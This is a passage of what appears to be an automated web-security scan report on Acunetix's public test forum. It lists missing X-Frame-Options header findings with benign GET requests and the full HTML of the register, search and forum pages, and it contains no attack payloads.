posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 402 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3673 |
| Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 2809 |
| Response Body - size: 2,809 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 332 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 2961 |
| Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=0 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 10037 |
| Response Body - size: 10,037 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro 